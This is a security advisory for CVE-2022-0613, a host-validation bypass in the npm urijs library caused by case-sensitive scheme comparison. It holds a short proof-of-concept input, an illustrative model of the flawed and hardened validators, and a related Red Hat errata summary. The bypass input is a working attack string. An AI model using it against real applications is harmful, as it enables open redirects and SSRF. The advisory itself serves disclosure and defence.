Headline
CVE-2022-0613: Authorization Bypass Through User-Controlled Key in uri.js
Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8.
Description
Bypass for https://huntr.dev/bounties/1625558772840-medialize/URI.js/
urijs fixed the issue for CVE-2021-3647; however, an attacker can still exploit it because the earlier patch compares the protocol scheme case-sensitively. An attacker can use mixed-case scheme spellings such as HTTP, htTP or HTtp to bypass the patch for that bug.
Proof of Concept
var URI = require('urijs'); // affected versions: urijs prior to 1.19.8
var url = new URI("HTTPS:///github.com/abc"); // upper-case scheme followed by three slashes
console.log(url); // hostname is parsed as null and the host ends up in the path
OUTPUT:
URI {
  _string: '',
  _parts: {
    protocol: 'HTTPS',
    username: null,
    password: null,
    hostname: null,
    urn: null,
    port: null,
    path: '/github.com/abc',
    query: null,
    fragment: null,
    preventInvalidHostname: false,
    duplicateQueryParameters: false,
    escapeQuerySpace: true
  },
  _deferred_build: true
}
Impact
Bypass of host-validation checks, open redirect, SSRF, etc., depending on how urijs is used.
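The following is an added illustration for this advisory; it is not urijs source code, not the PoC above, and makes no claim about the exact patch shipped in urijs 1.19.7 or 1.19.8. It models the bug class in a few dozen lines: a URL splitter (splitUrl, an assumed name) whose special handling for http/https compares the scheme case-sensitively, the same splitter with the comparison made case-insensitive as RFC 3986 section 3.1 requires, and two allowlist validators (isAllowedTargetWeak and isAllowedTarget, both assumed names) showing why host validation must fail closed when the parser yields no hostname. The allowlists, the slash-collapsing behaviour of the special case, and the host not-allowed.example are constructed for the demo.

```javascript
// Added illustration for this advisory; NOT urijs source code. It models the
// bug class: a URL splitter whose http/https special case compares the scheme
// case-sensitively, the same splitter with the comparison fixed, and an
// allowlist validator that fails closed when no hostname was extracted.

// Constructed allowlists for the demo.
const WEB_SCHEMES = new Set(['http', 'https']);
const ALLOWED_HOSTS = new Set(['github.com']);

// Split "scheme://authority/rest" into { protocol, hostname, path }.
// Assumption of this model: the http/https special case collapses any run of
// slashes after "scheme:" to "//" (as browsers do), so "https:///host" still
// yields a hostname. When the special case is skipped, the empty authority
// between the second and third slash becomes hostname null and the host
// lands in the path, which is the shape of the output shown above.
function splitUrl(input, opts = { caseInsensitiveScheme: true }) {
  const parts = { protocol: null, hostname: null, path: '' };
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):([\s\S]*)$/.exec(input);
  if (!m) {
    parts.path = input; // no scheme: relative reference
    return parts;
  }
  const scheme = m[1];
  let rest = m[2];
  parts.protocol = scheme;
  // RFC 3986 section 3.1: scheme names are case-insensitive. The flawed
  // variant compares the raw spelling, so 'HTTPS' misses the special case.
  const key = opts.caseInsensitiveScheme ? scheme.toLowerCase() : scheme;
  if (WEB_SCHEMES.has(key)) {
    rest = rest.replace(/^[\\\/]+/, '//');
  }
  if (rest.startsWith('//')) {
    const afterSlashes = rest.slice(2);
    const end = afterSlashes.search(/[\\\/?#]/);
    const authority = end === -1 ? afterSlashes : afterSlashes.slice(0, end);
    parts.path = end === -1 ? '' : afterSlashes.slice(end); // path plus query/fragment
    // Userinfo and port are stripped; IPv6 literals are out of scope here.
    const hostPort = authority.slice(authority.lastIndexOf('@') + 1);
    const host = hostPort.replace(/:\d*$/, '');
    parts.hostname = host === '' ? null : host.toLowerCase();
  } else {
    parts.path = rest; // opaque / urn-style reference: no authority component
  }
  return parts;
}

// Flawed variant: the raw scheme spelling is compared.
function splitUrlCaseSensitive(input) {
  return splitUrl(input, { caseInsensitiveScheme: false });
}

// Validator of the weak shape this advisory targets: "no hostname" is taken
// to mean a relative, same-site target and is allowed.
function isAllowedTargetWeak(input, parser = splitUrlCaseSensitive) {
  const p = parser(input);
  if (p.hostname === null) return true;
  return ALLOWED_HOSTS.has(p.hostname);
}

// Hardened validator: normalizes the scheme itself, fails closed on a missing
// hostname, then checks the allowlist. It does not depend on the parser's
// scheme special-casing being correct.
function isAllowedTarget(input, parser = splitUrl) {
  const p = parser(input);
  if (p.protocol === null || !WEB_SCHEMES.has(p.protocol.toLowerCase())) return false;
  if (p.hostname === null) return false;
  return ALLOWED_HOSTS.has(p.hostname);
}

// Stand-alone demo over constructed inputs ("not-allowed.example" is a placeholder).
function demo() {
  const inputs = ['HTTPS:///github.com/abc', 'https://github.com/abc', 'HTTPS:///not-allowed.example/'];
  for (const u of inputs) {
    console.log(u, splitUrlCaseSensitive(u),
      'weak:', isAllowedTargetWeak(u),
      'hardened:', isAllowedTarget(u, splitUrlCaseSensitive));
  }
}
demo();
```

The point of the two validators is the mitigation, not the parser: even with the flawed splitter underneath, isAllowedTarget rejects "HTTPS:///not-allowed.example/" because it refuses any target without a hostname, whereas the weak validator waves it through and a browser or HTTP client will then resolve the host the parser never saw.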
Related news
Red Hat Security Advisory 2022-8652-01 - This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.
A minor version update (from 7.11 to 7.11.1) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
Related CVEs:
* CVE-2019-8331: bootstrap: XSS in the tooltip or popover data-template attribute
* CVE-2021-3717: wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users
* CVE-2021-31684: json-smart: Denial of Service in...